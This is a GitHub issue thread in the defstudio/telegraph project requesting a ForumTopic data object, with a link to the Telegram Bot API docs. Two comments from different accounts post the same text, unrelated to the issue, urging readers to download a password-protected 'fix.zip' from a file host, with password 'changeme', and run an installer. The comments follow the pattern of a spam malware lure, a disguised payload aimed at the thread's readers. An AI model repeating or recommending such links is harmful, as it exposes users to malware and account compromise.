### ISSUE TITLE
Create ForumTopic dto

### ISSUE THREAD

**Issue by MarioGattolla** [defstudio/telegraph#627]
https://core.telegram.org/bots/api#forumtopic

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
